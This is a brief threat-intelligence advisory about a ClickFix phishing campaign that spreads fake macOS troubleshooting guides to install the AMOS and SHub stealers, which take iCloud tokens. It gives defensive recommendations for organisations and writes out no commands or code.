Fake macOS Troubleshooting Sites Deployed by ClickFix Campaign Steal iCloud Credentials from macOS Users
What Happened — Microsoft researchers uncovered a new “ClickFix” phishing campaign that publishes bogus macOS troubleshooting guides on platforms such as Medium and Craft. Victims are instructed to copy‑paste Terminal commands that silently install the AMOS and SHub stealer malware, which harvests iCloud authentication tokens and other personal data.
Why It Matters for TPRM —
- Threat actors exploit trusted content platforms to reach employees, increasing the likelihood of successful credential theft.
- Compromised iCloud accounts can expose corporate documents, internal communications, and SaaS credentials stored in Apple’s ecosystem.
- The campaign demonstrates a supply‑chain‑like abuse of third‑party publishing services, highlighting the need for strict content‑verification controls.
Who Is Affected — All organizations with macOS users, especially those that rely on iCloud for file sync, device management, or authentication (technology, professional services, education, media, etc.).
Recommended Actions —
- Instruct macOS users to verify the authenticity of any troubleshooting guide before executing Terminal commands.
- Enforce least‑privilege policies and disable execution of unsigned scripts where possible.
- Deploy endpoint detection that flags the AMOS/SHub binaries and monitor for anomalous iCloud token usage.
Technical Notes — Attack vector: phishing via fake “ClickFix” guides; malware delivered through legitimate‑looking Terminal commands; data exfiltrated includes iCloud authentication tokens, contacts, photos, and synced documents. Source: HackRead